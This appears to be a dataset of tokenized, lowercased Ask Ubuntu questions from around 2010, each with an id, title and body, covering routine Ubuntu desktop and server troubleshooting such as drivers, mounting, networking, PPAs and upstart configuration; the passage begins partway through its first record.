successfully . setting required flags on partition ... ok going to empty the journal ( $ logfile ) ... ok pread : input/output error failed to calculate number of free mfts : input/output error . remount failed : input/output error . needless to say , i really want this backup to work : - ( please help ! update : ntfsmount says this : root @ z : /var/backup # ntfsmount storage-disk.img storage-disk pread : input/output error failed to calculate number of free mfts : input/output error . failed to mount '/var/backup/storage-disk.img ' : input/output error . ntfs is inconsistent . run chkdsk /f on windows then reboot it twice ! the usage of the /f parameter is very important ! no modification was made to ntfs by this software . mount failed . how do i run chkdsk /f on an image ? do i have to create a partition and write the image on it ? how do i do that ?
4586	is there a ppa for the latest blender version ?	i am interested in trying out the blender 2.54 beta , but do n't have the time or patience to download and install all of the dependencies for it and compile it myself . is there a ppa somewhere that i can use to obtain a pre-compiled package for it ?
4590	how do i hide the drive icons of my other partitions from the desktop ?	i have the hard disk icon for each of my partitions on my gnome desktop . i want a clean look , how do i hide them ?
4606	nginx ppa does not work ?	i want to use the newest version of nginx , so i wanted to add the nginx/stable ppa sudo add-apt-repository ppa : nginx/stable sudo apt-get update however , the upgrade command says that there are no upgrades available and nginx is still the old version . did i do something wrong ? i use ubuntu server 10.04 lucid add-apt-repository output : $ sudo apt-add-repository ppa : nginx/stable executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv 8b3981e7a6852f782cc4951600a6f0a3c300ee8c gpg : requesting key c300ee8c from hkp server keyserver.ubuntu.com gpg : key c300ee8c : `` launchpad stable '' not changed gpg : total number processed : 1 gpg : unchanged : 1 apt-cache policy ouput : $ sudo apt-cache policy nginx nginx : installed : 0.7.65-1ubuntu2 candidate : 0.7.65-1ubuntu2 version table : *** 0.7.65-1ubuntu2 0 500 http : //eu-west-1.ec2.archive.ubuntu.com/ubuntu/ lucid/universe packages 100 /var/lib/dpkg/status
4609	why do you have to pay to get the ubuntu one for windows ?	i just noticed that ubuntu one is available for windows if you subscribe . https : //one.ubuntu.com/plans/ why is it limited ? it would be great advertising , and help the migration .
4612	wireless not working after installation	i 've installed the latest ubuntu release ( 10.4 ) on my hp mini 110 , the installation went smoothly but i do n't have any wireless connection . ( it says wireless disabled ) i installed ubuntu side by side with an already existing windows xp , on windows wireless works fine . i tried both ubuntu desktop edition and netbook remix , but same problem on these two modes . it happens both when i run ubuntu from the usb and when it 's installed on the hard-drive . i found many articles about the broadcom network card issues this netbook has , but they all suggest to run : sudo apt-get update sudo apt-get -- reinstall install bcmwl-kernel-source sudo reboot ( e.g . this official guide ) however this does n't seem to solve my problem .
4614	strange window popping on gnome	a couple of days ago , when i came back to my computer after a couple of hours , the following window was on my desktop : the title bar said `` gnome-screensaver-dialog '' . that 's it . i just clicked ok , and went on . this has happened to me once before , but a long time ago . please note , i just have the plain blank screen as the screen saver .
4615	how can i play content from a media server ?	i have my xbox 360 playing content from my ubuntu 10.04 pc using minidlna application . what software could i install on my laptop to play the same content from my pc ? totem does not appear to have a browse option .
4620	how do i share a folder with a friend with ubuntu one ?	how do i share a folder with a friend with ubuntu one ?
4621	how do i create a shared folder/remotely control a printer between two ubuntu machines ?	i have an upstairs and downstairs computer ; i 'd love to know how to create a shared folder between the two ( through a wireless network ) i 'd also love to know if there is any way to get my upstairs computer to send a file to my downstairs computer ( which has the printer ) and get it to print , through a wireless network .
4625	is there a gui utility to mount remote filesystems over ssh ?	is there a gui utility to mount remote filesystems over ssh ( sshfs ) ?
4628	`` gnome do '' stops working	after one or two times i use gnome do , it stops working . yet it does not give out an error message . i currently have it configured to pop up when with then super + space key combination . i have to constantly go to the menu and activate it again .
4635	uploading multiple photos onto facebook	i am having difficulties loading multiple photos directly from sd card onto facebook . it works fine when i select one photo at a time . when i select more than one it does not upload the photos into my facebook photo album . i tried loading multiple photos from f-spot onto facebook but have a similar experience . in both instances it only loads one photo at a time which is extremely time consuming .
4645	how do you add a new window manager to the gdm menu ?	so , i 've been having trouble finding a definitive answer on how to do this . i 've compiled and installed a window manager that is not available in the ubuntu package repositories , and now i 'm attempting to add it to the gdm options menu . what 's the `` ubuntu '' way to do this ? i 'm sure there must be a 'most correct ' approach . anyone have any clues , or links to websites ? i 've seen a few answers in the ubuntu forums , but no-one really had a clear , `` this is the right way to do it '' that i found .
4652	refresh rate of monitor resets to 60hz after each reboot	i 'm using ubuntu 10.10 64 bit . it started to revert the refresh rate of my monitor to 60hz , each and every time i log on . i change it back in nvidia panel , save it to x config file , but it just does n't last . oh , i set every time to 85hz . as noted below , this is the part in my x config file section `` screen '' removed option `` metamodes '' `` 1024x768_85.00 `` removed option `` metamodes '' `` 1024x768_85 +0+0 '' > removed option `` metamodes '' `` 1024x768 +0+0 ; 1024x768_85 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` 1024x768_85 +0+0 ; 1024x768 +0+0 '' subsection `` display '' depth 24 endsubsection ''
4653	how do i get rid of `` u3 system '' on my usb drive ?	i have a usb drive ( sandisk sdcz40-016g ) that mounts in a way i 've never seen before . when inserted , two items appear in places - > computer : '' sandisk ultra backup : 16gb '' contains my data , and `` cd drive : u3 system '' contains a windows executable . the part with the windows executable does n't look useful to me so i 'd like to remove it . i used gparted to delete the only partition listed on the device and then i created and formatted a new partition : strangely , the `` cd drive '' containing the windows executable was perfectly intact after this operation . what 's going on ?
4658	how to install intel 82852/855gm driver ?	when i installed arch linux , it detected my video card and monitors correctly `` out-of-the box '' . now i 've installed ubuntu 10.10 `` maverick meerkat '' and it has not . how do i configure ubuntu to use correct intel driers with a `` intel 82852/855gm '' graphics card ? ( i use a toshiba l10 intel centrino laptop . )
4660	how to configure a second ip address and bind it to a vboxheadless virtual machine ?	i 've requested my isp to dedicate me a second internet ip address and have got it . now i need to configure it ( i 've never had any experience with using multiple ip addresses on one network interface ) on my ubuntu 10.04 server so that it will be a public address of a virtualbox ( vboxheadless ) machine ( running ubuntu 10.04 server as well ) . would you be so kind to tell me how can i do so , or at least what docs to read and what specific subjects to google for ?
4661	logical partition or primary partition	today i was setting up an ubuntu server and while partitioning for raid0 i wound up setting /home as a logical partition . basically the partitioner defaulted to that option and i hit return and the system was off on the installation . anyway , does it matter that /home is a logical partition instead of a primary partition ?
4662	where is the x.org config file ? how do i configure x there ?	as ubuntu 10.10 seems to neither detect my graphics card ( intel 82852/855gm ) automatically nor use the corresponding intel driver even after manually installing it , i am looking into manually configuring x ( should n't i ? ) . where can i find the configuration files i need to edit ?
4665	missing sound on vmware fusion 3.1	i recently upgraded my vmware fusion from 2.x to 3.1 and was running ubuntu 10.04 . i had not problems until the upgrade at which point the sound is not working at all . it was fine in vmware 2.x . i installed the vmware tools but it did not fix it . i would appreciate if someone could throw light on the issue . thanks
4667	where to declare environment variables ?	what are correct places for : global environment variables meant to affect all users ? user-specific environment variables ?
4672	how to get default /usr/share/vim folder back ?	i was messing with by profile and ended up deleting /usr/share/vim folder and everything in it . how can i get this folder back ? sudo aptitude reinstall vim did not help basically i would want vim and gvim to be back to 'factory settings ' ... for this i 'll need original .vimrc as well
4675	how can i setup an nfs share using a gui ?	is there a gui for selecting which folders are shared via nfs ?
4677	update problems : packages held back	when i try and upgrade i get packages that are kept back , when i use dist-upgrade they will be upgraded however i get this warning : current status : 5 updates [ -1 ] . will @ will-desktop : ~ $ sudo aptitude dist-upgrade reading package lists ... done building dependency tree reading state information ... done reading extended state information initialising package states ... done the following packages are broken : libdrm-nouveau1 the following new packages will be installed : libkms1 { a } the following packages will be upgraded : libdrm-dev libdrm-intel1 libdrm-radeon1 libdrm2 5 packages upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0b/245kb of archives . after unpacking 2,077kb will be freed . the following packages have unmet dependencies : libdrm-nouveau1 : breaks : xserver-xorg-video-nouveau ( < 1:0.0.16 ) but 1:0.0.15+git20100219+9b4118d-0ubuntu5 is installed . the following actions will resolve these dependencies : remove the following packages : xserver-xorg-video-all xserver-xorg-video-nouveau score is 188 i do n't know whether to upgrade or not , looks like it might break my video
4678	how to remove username from `` me '' menu ( right near to power button on the top panel ) ?	my user name takes approximately as long as would 6 icons . i do n't need to see my username , i am the only user of my computer . how can i remove it ? i use ubuntu 10.10 . update : the answer found : gconftool -s /system/indicator/me/display -- type int 0 update : unfortunately the solution does n't work any more . now it totally removes the instant messaging menu ( including the icon ) instead of just removing a name .
4679	how to remove keyboard icon from keyboard layout indicator ( to leave just the language abbr . alone ) ?	i 'd like to remove a keyboard icon , so replacing `` [ # # # ] usa '' as keyboard layout indicator to just `` en '' , an english or american flag , or `` usa '' at least . how can i achieve this ? update : when i 've clicked to remove e-mail icon from the bar , keyboard language indication has disappeared also , and now i only see that useless keyboard icon , and do n't see what language is selected now : - ( i use ubuntu 10.10 .
4680	is there a dock , that works as a gnome panel applet ?	is there a dock , that works as a gnome panel applet , so i can put it into a panel alongside with other applets and indicators in one line ? i use ubuntu 10.10
4681	how do i enable a mac-style global application menu in classic desktop edition ?	how do i enable a mac-style global application menu in classic desktop edition of ubuntu 10.10 ?
4683	does gnome support desktop widgets ?	does gnome support desktop widgets ? any analogue to kde plasmoids , vista/win7 sidebar/desktop widgets , mac os x dashboard widgets , etc .
4690	restoring samba mappings after reboot ?	i 've setup a simple ubuntu 10.04 file server and want to have a handful of users attach from windows machine to a shared drive and to private home directories on a per machine basis . i 've got this all setup and have mapped the drives within windows ( shared = z : , home = h : ) on one of the machines and everything works fine . however when i restart the user machine they are still able to access the shared drive , but when trying to open their home drive i get the error , an error occured while reconnecting h : to \\server01\homes microsoft window network : the network name can not be found . this connection has not been restore if i then disconnect from the home and shared drive and reconnect then everything work fine , until i have to reboot the machine again ! any ideas why this is happening and how i can get round it ? ok so i 've made a little progress . if instead of mapping to the \server01\homes directory i map to the \server01\username directory , then i do n't get the error message like before . however it does say : incorrect password or unknown username for : \\server01\username if i enter the exact same password as before then i connect fine , but i 'd rather not have to force my users to enter a password each time the machine is started .
4691	what 's the best tool to create a product catalog in ubuntu ?	i 'm going to create a catalog for one of our proposals ... as i 've recently migrated to ubuntu , i do n't know tools to do such a job . in windows i might do this with ms powerpoint or adobe indesign . here i just know openoffice presentation . i wan na create a simple and official catalog . and i want to have a wast range of available free templates to choose among . what 's the best tool to create a fast , well-looking pdf catalog ?
4694	how to use a .iso image as a cd-rom repository ?	i have all images of debian , ubuntu and ubuntustudio as .iso . how can i use them as repository to install my desired packages with sudo apt-get install package-name ? i easily mount the .iso file with archive mounter , but when adding cd-rom in software sources it says please insert cd-rom . how should i do this without burning them to disk ?
4697	exchange email notifier ?	i do my coding work on an ubuntu machine at work , but i keep a laptop running windows with outlook for the corporate email . i do n't really want to fight with evolution and get it to work with the corporate setup , but i 'd like something that could let me know on the ubuntu machine if i got a new email in outlook/exchange . does such a thing exist ?
4699	is there a way to run a script every time i connect to a specifc wireless network ?	there is a specific wireless network i connect to that requires me to use vpnc to access the internet . if i make a script to do this , is there a way to set it up so every time i connect to this network , the script is run ? to be clear , i do n't want this script run with most wireless connections , just one specific one .
4702	how to log out without having to confirm ?	whenever i log out from a gnome session ( by clicking on the `` power '' button in the top panel and choosing `` log out ... '' , i have to answer the `` are you sure ... '' question . how can i configure my system to avoid this question ? since i already have performed two actions ( clicking on the panel button , and selected the `` log out '' item ) , it is quite probable that i actually want to log out . : )
4709	is there a vocal interface system for ubuntu ( able to map voice commands to console commands and parameters ) ?	as far as i can remember , on some of even pretty old cellphones it was possible to say a name to be dialled . from this i conclude that it is possible and not very complex to implement . so , do such a system exist , which listens to voice commands , converts them to console commands according to a predefined map and executes ?
4710	using sudo su for commands ?	i was working on developing my command line skills last night and ran into an issue where when i used sudo , i got an error message that said 'permission denied ' . however when i used 'sudo su ' and became root the command worked . why did n't sudo work in the first instance ? it was : $ sudo cat > /var/www/info . php < ? php phpinfo ( ) ; ? > ^d from the linux bible 2010 edition in the section on setting up a lamp server .
4717	i am using edgy eft ( 6.10 ) . if i switch to 10.04 , how will it affect performance ?	on my laptop ( hw info below ) i currently run ubuntu 6.10 ( edgy eft ) . the computer has been my work computer since 2006 . i am considering doing a reinstall to get something more recent . what can i expect , perfomance-wise ? $ lshw warning : you should run this program as super-user . lapdance description : computer width : 32 bits *-core description : motherboard physical id : 0 *-memory description : system memory physical id : 0 size : 2027mb *-cpu product : intel ( r ) pentium ( r ) m processor 1.60ghz vendor : intel corp. physical id : 1 bus info : cpu @ 0 version : 6.13.6 size : 1400mhz capacity : 1400mhz width : 32 bits capabilities : fpu fpu_exception wp vme de pse tsc msr mce cx8 sep mtrr pge mca cmov pat clflush dts acpi mmx fxsr sse sse2 ss tm pbe up est tm2 cpufreq
4719	what are benefits of aptitude compared to apt-get ?	to install a package i can `` apt-get install '' or `` aptitude install '' , to search - `` apt-cache search '' or `` aptitude search '' . i find these things pretty similar . so what are benefits of aptitude ?
4727	sound plays on headphones and speakers at the same time with lenovo thinkpad	the only thing really missing from this install is this issue with the sound . i 've searched all over the forums and i found one thing where you get the model and codecs and write them to a file , however , i ca n't seem to find what my `` model '' is because none of the postings have anything about lenovo laptops . here is the command they all asked for : code : cat /proc/asound/card0/codec # * | grep codec codec : realtek alc269 codec : intel g45 devibx with that info , how do i get the model , and how do i get my speakers to stop playing when headphones are plugged in . also , if i manually change the output device to headphones itll play just headphones in the sys prefs ... so it can work , but it does n't . i have a lenovo thinkpad l512 as well . thanks so much to whoever can answer this ... the ubuntu forums are nearly useless ... ive never gotten a correct answer back on that site . also , i 've filed a bug report and i know it 's the alsa plugin , i do n't know how to fix it though .
4729	how to use the `` about me '' without evolution	as the title suggests , i want to use the about me section under system > preferences without using evolution . ( i do n't have evolution installed on my computer as i handle email/calendering etc via google apps ) as it stands i get an error message unless evolution is installed which means i ca n't establish a profile properly on the indicator applet session as it seems to pull from 'about me'
4731	thunderbird and desktop calendar	is there a way i can use thunderbird to access and modify my desktop calendar ( or anything other than evolution for that matter ) ?
4732	delete a calendar from evolution	i imported my google calendar into evolution , now i ca n't find a way to delete the calendar . how do i do this ?
4733	ubuntu livecd hangs - unable to access my laptop	my acer aspire laptop is unbootable . i 'm trying to reinstall ubuntu 10.04.1 . boot options accessible ok via f2 . in fact , it still leads me into the olg grub2 menu , but i ca n't use any of the options because of corrupted installations on the various partitions ( hence my wish to reinstall ) . any type of livecd hangs in the middle of the installation . with ubuntu-10.04.1-desktop-i385.iso ( md5sum checked ) , the installation seems to hang at `` running /script/casper-premount '' ( when run in non-quite mode ) , ( and nothing seems to happen from there ) . i tried various other installations ( via unetbootin eg rescuecd on usb stick etc ) ... the laptop seems to access both usb and cdrom ok ... my laptop has become totally unusable ? what can i do ? is the 'c ' option at the old grub2 menu of any use ? any help would be much appreciated - i 'm rather desperate to get my laptop working again !
4737	should i use a volume group or a logical volume for /home on lvm ?	i 'm setting up lucid on a new laptop and i 'd like to use lvm - partly for flexibility and partly to make it easy to move /home to a new distro if needed . should i be setting up /home on it 's own vg ( initially containing a single pv ) or is it ok to add all pvs to a single vg and to slice off a lv for /home ? it feels to me like one vg for /home and one vg for everything else is the best answer for keeping /home safe or moving it at a later date , but does that limit my flexibility for resizing things later ? thanks
4743	how do i replace the memenu username with my actual name ?	whilst i like the memenu , one thing has always bothered me about it ; rather then use my actual name , it uses my username . so , is there anyway to change this ?
4747	what is the command getweb ?	i found on this launchpad bug ( https : //bugs.launchpad.net/ubuntu/+source/foo2zjs/+bug/96454 ) the command : sudo getweb 1020 i do n't know what getweb is , so here is the question .
4750	how can i find which command is bound to a given keyboard shortcut ?	how can i find which command is bound to a give keyboard shortcut ? i remember playing with my keyboard shortcuts recently in different places : system/preferences/keyboard shortcuts , `` gnome-keyboard-properties '' and compiz . is there a central place where all those shortcuts are kept or do i have to remember all the places where i set a keyboard shortcut ?
4751	how can i get my microphone to work in a virtualbox windows xp guest ?	i have been trying to get this to work for several days . i have googled until i ca n't google anymore ... .. i have ubuntu 10.04 64 bit with virtualbox ver . 3.2.8 installed . i have a windows xp pro guest . i am running rosettas stone in the guest . everything works great except the mic . the guest audio is : host driver : pulseaudio controller : ich ac97 this works well in lucid . in xp it 's as if the os does n't know how to use the mic . i see it in the xp sound app . it does n't work but it 's listed as intel integrated sudio . when i run sound recorder , i click on record and the bar/slider that indicates time recording does n't move . are there any settings in vb that i need to modify to get this to work ? i tried getting rosetta stone to work in wine but had no luck .
4752	is btrfs in 10.10 considered stable ?	i 'm upgrading my laptop to maverick ( 10.10 ) and i noticed btrfs is an option for the filesystem . i read a while ago that the ubuntu team were n't sure if it was going to be stable for maverick . does anyone know ( with references ) if it was approved for stable use ? any other pros and cons ? for the moment i 've made my root partition ext4 and my home partition btrfs , but i could reinstall . my laptop is a secondary computer .
4753	what is the best way to launch a process when the internet connection goes up/down ?	what is the best way to automatically launch a process when the internet connection goes up/down ?
4755	i 've installed ubuntu 10.04 lamp server . where do i best create folders to put my websites ?	i 've installed ubuntu 10.04 lamp server . the only ( in addition to all the standard technical users created by installation ) user is `` administrator '' ( should i create more ? ) . i doubt it is correct to place public websites to /home/administrator/public_html/ . what is the correct place ? i am going to use apache 's name-based virtual host support to host multiple websites .
4758	why does an opera widget ( analog clock ) use so much cpu ?	when i was using arch linux with kde 4.5 and opera analogue clock widget , it was much less cpu-consuming . now , on ubuntu 10.10 ( and i use the same proper graphics driver ) it consumes mean of 15 % of cpu ( least of 11 % , max of 34 % ) . what may the reason be ?
4759	how to enable video playing on a second monitor using intel graphics ?	on windows overlay-rendered video playback was working correct on all the monitors . on linux i not only have to place my external monitor below ( instead of right to ) my laptop 's panel to enable its full resolution , but video player displays blue square instead of the video picture if placed on the second display . can i overcome it other way than by using software video rendering ? i use intel 82852/855gm graphics and ubuntu 10.10 . i mainly use raw mplayer to play video . update : i 've noticed , that the problem only takes place when i use a big ( 1600x1200 ) monitor ( placed under the laptop 's panel , otherwise it 's impossible to use that big resolution with intel driver ( or just my oldie intel card ) ) . when i use a 1024x768 external panel ( placed to the right of the laptop 's panel ) , overlay video rendering seems to work ok on both screens .
4760	ubuntu 10.04 gnome/x hang	i have ubuntu 10.04 running on a dell laptop/nvidia video . everything works fantastic , except for one `` nit '' that is very annoying.. every so often the graphical interface stops responding , such that the following happens : any gnome-terminals i happen to have open are still working normally , if i have audacious running , the music continues to play , but all gnome panels no longer respond , i can not drag any open windows around , but i can right-click on the desktop and get that gnome menu , but none of the menu selections respond . the first time this happened , i had to powercycle the laptop , as i didnt have any shell-window open.. it was then i discovered that ubuntu now disables the ctl-alt-bksp/x restart . i 've since re-enabled it , and an x restart restores the gui . this happens often at least once a day , and since i use the laptop daily , it becomes annoying to lose the apps i had running when i have to restart x. i 've tried checking dmseg/syslog/messages immediately after this happens , but have not spotted any `` smoking-gun '' pointing to why this is happening . i first thought it might be compiz causing it , so i disabled it , still happened . since the laptop has nvidia 8400m video , i use the nvidia closed-source `` blob '' driver.. i 'm posting here to see if 1 ) anybody else is seeing this , 2 ) where i should be looking for the cause ... . thanks
4761	how can i divide processes amongst multiple computers	i have a spare computer that has ubuntu server edition ( 10.04.1 ) installed on it and was wonder if there was a way to use my server to help processes data on my ubuntu desktop ( same release ) . i would like to share any heavy-processor functions with my server to ease the load on my desktop . does anyone know of a good/easy way to do this ? they 're connected on the same network through a router . i 'll list what i think may be relative components for each one below . desktop - intel core 2 quad @ 2.83ghz ethernet controller : atheros communications atheros ar8121/ar8113/ar8114 pci-e ethernet controller ( rev b0 ) server - pentium 4 @ 2.8ghz with hyper-threading ethernet controller : intel corporation 82540em gigabit ethernet controller ( rev 02 )
4762	how to set up video and audio players to use realtime ( or close ) priority ?	i use raw mplayer to play video , deadbeef to play audio and skype for voip . heavy cpu-consuming processes ( like rendering a website in firefox , redrawing a java ide window or compilation ) cause disturbances in multimedia playback processes . how to overcome this ? i 'd agree to those cpu-consuming processes to be a bit slower if it wo n't disturb multimedia playback .
4765	how to install realtime kernel ?	axel wrote : `` try using the a realtime kernel , it 's more responsive and the apps `` seems to hang less '' '' . how to do this ?
4766	is there a program in ubuntu repositories that will keep a clipboard history for me ?	i occasionally clobber whatever i had already copied to the clipboard . it would rock to just be able to keep all of my clipboard history right in front of me .
4769	how do i automatically respawn gnome do when it crashes ?	i use , and love , gnome do . sometimes , though , it crashes and i have to re-run it from the menu . is it possible to set up my gnome session to automatically try to respawn do ? i realize there are some caveats contemplating this - if my system gets into a state where do can not run at all , this would create an infinite loop of respawning , crashing , and respawning again , but in my experience do crashes just enough for it to be slightly annoying , and never right after i restart it manually . if someone can make a case for this being a bad idea , i 'd consider that a good answer as well .
4777	how to fix an error using a colorscheme for gvim ?	my vim directory : > : /usr/share/vim $ ls -al total 28 drwxr-xr-x 5 root root 4096 2010-09-26 00:03 . drwxr-xr-x 352 root root 12288 2010-09-25 14:35 .. drwxr-xr-x 7 root root 4096 2010-09-25 14:35 addons lrwxrwxrwx 1 root root 15 2010-09-25 14:35 gvimrc - > /etc/vim/gvimrc drwxr-xr-x 2 root root 4096 2010-09-25 14:35 registry drwxr-xr-x 17 root root 4096 2010-09-25 14:35 vim72 lrwxrwxrwx 1 root root 5 2010-09-25 14:35 vimcurrent - > vim72 lrwxrwxrwx 1 root root 8 2010-09-25 14:35 vimfiles - > /etc/vim lrwxrwxrwx 1 root root 14 2010-09-25 14:35 vimrc - > /etc/vim/vimrc > : /usr/share/vim $ ls vim72/colors ron.vim ir_black.vim morning.vim pablo.vim vim runtimepath : /usr/share/vim , /etc/vim i have the following line in /etc/vim/vimrc colorscheme ir_black problem : as you can see above , i have ir_black.vim in the /usr/share/vim/vim72/colors directory . even then , i get the below error when launching gvim and screen is just white ( no color ) : error detected while processing /usr/share/vim/vimrc : line 100 : e185 : can not find color scheme ir_black what i 've done : > : /usr/share/vim $ sudo mkdir /usr/share/vim/colors & & sudo cp -r /usr/share/vim/vim72/colors/* /usr/share/vim/colors this got the colorscheme to work but my screen started looking very weird with gaps between each character . how can i fix this ?
4778	is it possible to use a small lcd to display load ?	i 'm putting together a super cheap rackmount server and it would be nice to have a little lcd in the 5.25 '' bay . i 'm looking for the cheapest lcd that i can write out the cpu load to . anyone done this already ? which product did you use and what software do i need to install to output this . if possible the output of the whole uptime command would be best .
4784	what do the ubuntu one emblems mean ?	i decided to try out ubuntu one for the first time . i added my computer via system - > preferences - > ubuntu one , and then i right-clicked on a folder and clicked `` synchronize on ubuntu one '' . there was no immediate feedback that anything had happened , but now the folder 's only sub-folder has some kind of ubuntu one emblem on it : what does this mean ?
4788	nautilus git integration	is there any equivalent to tortoisesvn but for ubuntu / git ? i 'd like to integrate git commands to nautilus .
4796	how can i simply password-protect a file ?	is there any simple ( ie : right click in nautilus ) way to password protect a particular folder/file in ubuntu ? i 've got a few files containing sensitive info and i 'd much prefer that if/when i leave my computer alone , they are n't accidentally accessed by someone else . the secruty does not have to be extremely tight . my only concern is that when family/friends come over , i do n't really like the idea of them looking at my bank details , accounts or , you guessed it , porn collection . a simple , effective way to let me put my machine in the hands of someone else knowing that said machine can not cause me embarresment is the sole reason why i 'd like to see this in ubuntu .
4801	how to back-up a wireless setup ?	i 'm about to do a fresh install of my ubuntu desktop system . when i originally put the system together it took me a week or so to figure out how to get wireless working . and i ca n't find my notes on how i did this . how do i back-up and then re-install the existing wireless settings , drivers , etc ? i 'm not sure how to locate the driver and the various config files . mainly looking for a logical plan to go about this . i can provide additional info if this is not enough to go on .
4814	netbook edition 10.04 default mail client	i 've installed the netbook edition 10.04 , and i 've setted thunderbid as default mail program , but when i click on the mail icon in the tray bar , it always calls evolution ... what i 'm missing ?
4819	how do i run tomboy in the notification area at startup ?	i tried adding tomboy in system - > preferences - > startup applications , but this causes the `` search all notes '' window to appear every time i log in . i just want it to run in the notification area so that i can use it later via hotkeys or its notification area icon popup menu .
4820	keeping emacs from splitting the window when openning multiple files	whenever i open more than one file at the same time with emacs , as in : emacs foo.dat bar.dat the window that opens will be split between the two files ( a buffer for each file ) . i would like to avoid that . is there a line i can place in my .emacs file to keep that from happening ? i would like emacs to only open one buffer in the window , no matter how many files i 'm loading . i 'm using version 23.1.1 .
4823	has anything been changed in gnu/linux to create ubuntu , or has stuff just been added on ?	the question says it all . did cannonical make any changes to the basic gnu/linux os before building ubuntu on top of it , or is the full gnu/linux still under there somewhere ?
4826	switching a server to static ip from dhcp	i am running an ubuntu 10.04 server installation and i recently had to switch it from dhcp to static ip . i edited /etc/network/interfaces file and switched iface eth0 inet dhcp to iface eth0 inet static address 192.168.1.167 netmask 255.255.255.240 network 192.168.1.160 broadcast 192.168.1.175 gateway 192.168.1.161 you 'll notice the ips are a little strange . this is because the sever is now on a special subnet dedicated to isolating specific servers . i also edited the resolv.conf file to include the proper dns servers ( including one of google 's just in case all hell broke lose ) . the problem is that , seemingly randomly , the machine will lose the ability to talk to the outside world . i know the machine is still up , but it acts like it has no networking at all . i think part of the issue is that there is no dhcp running to this subnet ( nor will there be ) and the dhclient seems to still be running on occasion which causes some sort of conflict ( no idea what ) which causes networking to die . i can not , however , remove the dhcp3-client package as it also causes the ubuntu-minimal package to be removed and that would be bad . so , any ideas ? what might be calling the dhclient and what can i do to stop it from running ?
4827	performance issues running ubuntu 10.04 as guest os in vmware with windows 7 host ?	i have ( portable ) virtualbox installed on a usb key running on a 64-bit windows 7 host . i installed 32 bit ubuntu 10.04 as a guest os . during spikes in processor usage on the guest os ( based on looking at top ) , the ubuntu virtual box freezes up for 5-10 seconds . the guest becomes unresponsive with the virtualbox window showing as `` not responding '' . there seems to maybe be a correlation between this behavior and network accesses . i 've experimented with the number of cpus allocated to the virtual box , added and removed ram , and adding video memory -- all to no avail . i have not attempted disabling or changing the processor level virtualization ( vt-x ) . i 'm wondering if there 's anything particular about ubuntu 10.4 that might be impacting this ? should i have installed 64-bit ubuntu ( or should it matter ! ? ) . is there a virtualbox setting i 'm missing that would improve my experience ? any help is appreciated .
4830	easiest way to copy ssh keys to another machine ?	i am lazy at home and use password authentication for my home machines . i am ready to move to key based authentication . there are many options on the web on how to do this , including catting then sshing the key over , scping the key over directly , etc . i am looking for the easiest and recommended way to copy a key over , hopefully there is a convenience wrapper somewhere in the ubuntu ssh package ? i 'm already aware on how to shut off password logins .
4834	how do i rebuild a corrupt dpkg status file ?	whenever i type sudo apt-get remove and then press the tab key for auto-completion i get the following message : grep-status : /var/lib/dpkg/status:15945 : expected a colon . i do n't see anything especially strange at line 15945 in the status file . it 's a dot character in the description field of a mono library package and inserting a colon did not help . removing the line containing the dot did not work either . overwriting the file with status-old resulted in the same message . is there some way to rebuild the status file ?
4836	changing default bittorrent program	i have multiple torrent programs installed and when i download a .torrent file ( in this case an ubuntu iso ) using google chrome and open it , it does n't open in my preferred program . how can i change this ?
4841	why are 2 adobe flash plugin on usc ( ubuntu software center ) ?	as you know in ubuntu software center is 2 times adobe flash plugin . one is called adobe flash plugin and other adobe flash plugin 10 . which of the two to install ? or rather it is the recommended installation methods ? if we think well , we can install the adobe flash plugin for firefox from the notification date ( install missing plugin ) or walking on the adobe website and downloading the package .deb . after all , how to properly install flash player on linux ubuntu ? ( but my biggg question is why are 2 adobe flash plugin on usc ? ... for what ? if you click on `` more info '' , the description are the same for both )
4843	fetch mail from msn/windows live ! in evolution	i 'm trying to sync a hotmail/windows live/msn email account to evolution - however i 'm unable to do so with both pop and imap . if i understand correctly this is because microsoft blocks all email clients other than outlook . is there a way around this ?
4848	how to clone audio output ?	i have two sets of speakers : one is set of stereo loudspeakers with a subwoofer ( not 2.1 , just a sub with a low-pass filter ) and the other is a set of stereo speakers with a headphone jack , used solely as an inline amplifier and volume control for my headphones . currently i have my pulseaudio output set to `` analog surround 4.0 output . '' my motherboard has output jacks for front , side , rear , and `` ctr bass '' which i assume is meant to be a subwoofer channel , for 6.1 surround capability . i have one set of speakers plugged into `` front '' and one set plugged into `` rear '' . this gives me approximately what i want : i can listen to the headphones or the loudspeakers just by turning on the appropriate amplifier . however , i 'm not sure that this is quite what i want . i 'm assuming that the output of front left and right channels is the same as the rear channels , but i do n't know that for sure and i 'm seeking reassurance . just in case i play a game or use some other surround-sound source , i 'd like to ensure that these outputs act as two stereo outputs rather than one surround output . also , i 'd like to be able to send audio from a particular client to an output of my choosing . paprefs does not seem to offer this level of fine-grained control . does anyone know how i can achieve these things ?
4850	upstart config to start sync daemon as non-root user	i am planning to use inosync to sync data from master server to several client servers . i have created a user called rsyncuser in both master and slaves with access permissions and passwordless ssh access from master to slave servers . inosync is working when i use it from the command line as rsyncuser . next i want this to start automatically when server is turned on . i figured upstart is the way to get this working . i am unable to find the right upstart command to get this working . here is my upstart conf file . the problem seems to be around running `` inosync -d -c /etc/inosync/inosync_rsyncuser.py '' as a given user . as you can see i have tried a number of various options ! description `` start inosync to sync data to other cdn servers as rsyncuser '' console output # start on startup # stop on shutdown start on ( net-device-up and local-filesystems ) stop on runlevel [ 016 ] # start on runlevel [ 2345 ] # stop on runlevel [ ! 2345 ] # kill timeout 30 env run_as_user=rsyncuser expect fork script echo `` inosync updtart job seems to have started '' > > /tmp/upstart.log # exec sudo -u rsyncuser -c `` ls -la '' > > /tmp/upstart.log 2 > & 1 # logfile=/var/log/logfile.`date + % y- % m- % d`.log # exec su - $ run_as_user -c `` inosync -d -c /etc/inosync/inosync_rsyncuser.py '' > > $ logfile 2 > & 1 # exec su -c `` ls -la '' > > /tmp/upstart.log 2 > & 1 # emit inosync_running end script
